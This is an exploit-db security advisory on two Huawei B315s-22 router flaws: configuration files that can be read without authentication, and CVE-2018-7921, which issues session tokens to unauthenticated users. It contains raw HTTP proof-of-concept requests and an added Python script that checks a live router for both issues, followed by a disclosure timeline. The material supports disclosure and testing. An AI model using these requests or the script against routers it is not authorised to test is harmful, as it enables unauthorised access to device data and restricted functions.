Huawei B315s-22 – Information Leak

  • Author: Usman Saeed
    Date: 2018-12-11
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/45971/
  • #Product Family: LTE
    #Model: B315s-22
    #Firmware version: 21.318.01.00.26
    #Author: Usman Saeed (usman [at] xc0re.net)
    
    1. Unauthenticated access to sensitive files:
    
    It was observed that the web application running on the router allows unauthenticated access to sensitive files on the web server.
    
    POC:
    
    By sending a simple GET request without an authentication cookie, one receives valid responses:
    
    Request:
    GET /config/deviceinformation/config.xml HTTP/1.1
    Host: <omitted>
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    X-Requested-With: XMLHttpRequest
    DNT: 1
    Connection: close
    
    Response:
    
    HTTP/1.1 200 OK
    …
    
    <?xml version="1.0" encoding="UTF-8"?>
    <config>
    <devicename>1</devicename>
    <serialnumber>0</serialnumber>
    <imei>1</imei>
    <imsi>1</imsi>
    <iccid>0</iccid>
    <msisdn>1</msisdn>
    <hardwareversion>1</hardwareversion>
    <softwareversion>1</softwareversion>
    …
    
    Other resources accessible are:
    
    /config/dialup/config.xml
    /config/global/config.xml
    /config/global/net-type.xml
    /config/lan/config.xml
    /config/pcassistant/config.xml
    /config/voice/config.xml
    /config/wifi/configure.xml

    ## After discussion with Huawei: according to them, the consequence of this vulnerability is quite low, so they marked it as a non-vulnerability.

    2. Unauthenticated valid token generation [CVE-2018-7921]
    
    It was observed that an unauthenticated user can generate a "SessionID" and a "__RequestVerificationToken" by simply sending an HTTP GET request to "/api/webserver/SesTokInfo".
    
    These tokens may not give the user full access to the router, but with them one can reach several restricted resources on it.
    
    POC:
    
    First, we send a GET request, as mentioned above.
    
    Request:
    GET /api/webserver/SesTokInfo HTTP/1.1
    Host: <omitted>
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    X-Requested-With: XMLHttpRequest
    DNT: 1
    Connection: close
    Content-Length: 0
    
    Response:
    HTTP/1.1 200 OK
    …
    
    <?xml version="1.0" encoding="UTF-8"?>
    <response>
    <SesInfo>SessionID=<omitted></SesInfo>
    <TokInfo><omitted></TokInfo>
    </response>
    
    Now we use these tokens in a request to an endpoint that requires authentication:
    
    Request:
    GET /api/cradle/status-info HTTP/1.1
    Host: <omitted>
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    __RequestVerificationToken: <omitted>
    X-Requested-With: XMLHttpRequest
    Cookie: SessionID=<omitted>
    DNT: 1
    Connection: close
    
    Response:
    
    HTTP/1.1 200 OK
    …
    
    <?xml version="1.0" encoding="UTF-8"?>
    …
    
    Note that with an invalid or expired authentication session, the response is instead:
    
    Response:
    HTTP/1.1 200 OK
    …
    
    <?xml version="1.0" encoding="UTF-8"?>
    <error>
    <code>125002</code>
    <message></message>
    </error>
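
    The two checks above, as one added script that is not part of the original advisory or of any Huawei tooling: it requests each config path from section 1 without a cookie, then performs the SesTokInfo exchange from section 2 and tells the error-125002 rejection apart from a successful response. The endpoint paths and the error code are taken from the advisory; the host name, the made-up token values and the stand-in router used when no host is given are assumptions so the script runs offline.

```python
"""Check a Huawei B315s-22 for the two issues in this advisory (added example, not
part of the original). Assumes plain HTTP to the host given as argv[1] and the XML
layouts quoted above; with no argument it runs against a constructed stand-in."""
import sys
import urllib.request
import xml.etree.ElementTree as ET

# Paths the advisory lists as readable without any session (section 1).
CONFIG_PATHS = [
    "/config/deviceinformation/config.xml", "/config/dialup/config.xml",
    "/config/global/config.xml", "/config/global/net-type.xml",
    "/config/lan/config.xml", "/config/pcassistant/config.xml",
    "/config/voice/config.xml", "/config/wifi/configure.xml",
]
TOKEN_PATH = "/api/webserver/SesTokInfo"  # hands out SessionID + token (section 2)
PROBE_PATH = "/api/cradle/status-info"    # restricted endpoint used in the advisory
SESSION_ERROR = "125002"                  # code the router returns for a bad session

def http_get(host, path, headers=None, timeout=5):
    """Plain GET over HTTP; returns (status, body). Network errors propagate."""
    req = urllib.request.Request("http://%s%s" % (host, path), headers=headers or {})
    req.add_header("X-Requested-With", "XMLHttpRequest")
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.status, resp.read().decode("utf-8", "replace")

def parse_ses_tok_info(body):
    """Return (SessionID, __RequestVerificationToken) from the SesTokInfo XML.
    <SesInfo> holds the literal cookie string 'SessionID=<value>'."""
    root = ET.fromstring(body)
    name, _, session_id = (root.findtext("SesInfo") or "").partition("=")
    token = root.findtext("TokInfo") or ""
    if name != "SessionID" or not session_id or not token:
        raise ValueError("unexpected SesTokInfo response")
    return session_id, token

def error_code(body):
    """Return <code> if the body is an <error> document, else None."""
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return None
    return root.findtext("code") if root.tag == "error" else None

def check_config_files(get, host):
    """Section 1: config files answering 200 with well-formed XML and no cookie."""
    exposed = []
    for path in CONFIG_PATHS:
        try:
            status, body = get(host, path)
        except Exception:  # unreachable host or HTTP error: treat as not exposed
            continue
        if status == 200 and body.lstrip().startswith("<?xml") and error_code(body) is None:
            exposed.append(path)
    return exposed

def check_token_reuse(get, host):
    """Section 2: do unauthenticated SesTokInfo tokens unlock PROBE_PATH?
    Returns 'vulnerable' (non-error XML), 'rejected' (error 125002) or 'unknown'."""
    status, body = get(host, TOKEN_PATH)
    if status != 200:
        return "unknown"
    session_id, token = parse_ses_tok_info(body)
    headers = {"Cookie": "SessionID=" + session_id, "__RequestVerificationToken": token}
    status, body = get(host, PROBE_PATH, headers)
    if status != 200:
        return "unknown"
    code = error_code(body)
    if code == SESSION_ERROR:
        return "rejected"
    if code is None and body.lstrip().startswith("<?xml"):
        return "vulnerable"
    return "unknown"

# Constructed stand-in for a router, shaped after the responses quoted in the
# advisory; token values are made up and the real status-info body is elided above.
FAKE_SESTOK = ('<?xml version="1.0" encoding="UTF-8"?><response>'
               '<SesInfo>SessionID=abc123</SesInfo><TokInfo>tok456</TokInfo></response>')
FAKE_ERROR = ('<?xml version="1.0" encoding="UTF-8"?>'
              '<error><code>125002</code><message></message></error>')
FAKE_OK = '<?xml version="1.0" encoding="UTF-8"?><response>constructed</response>'
FAKE_CONFIG = ('<?xml version="1.0" encoding="UTF-8"?>'
               '<config><devicename>1</devicename></config>')

def fake_get(host, path, headers=None, timeout=5):
    """Mimics the vulnerable firmware: config files and tokens need no session."""
    headers = headers or {}
    if path in CONFIG_PATHS:
        return 200, FAKE_CONFIG
    if path == TOKEN_PATH:
        return 200, FAKE_SESTOK
    if path == PROBE_PATH:
        ok = (headers.get("Cookie") == "SessionID=abc123"
              and headers.get("__RequestVerificationToken") == "tok456")
        return 200, FAKE_OK if ok else FAKE_ERROR
    return 404, ""

if __name__ == "__main__":
    get, host = (http_get, sys.argv[1]) if len(sys.argv) == 2 else (fake_get, "stand-in")
    print("unauthenticated config files:", check_config_files(get, host))
    print("SesTokInfo token reuse:", check_token_reuse(get, host))
```

    Run it as `python3 check_b315.py <router-ip>` against a device you are authorised to test; a router that answers the probe with error 125002 after the token exchange reports "rejected", which is the behaviour to expect on patched firmware.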
    
    [+] Responsible Disclosure:
    
    Vulnerabilities identified – 31/07/2018
    Reported to Huawei – 31/07/2018
    Huawei patched the vulnerability and issued a CVE – 31/08/2018
    Public disclosure – 01/09/2018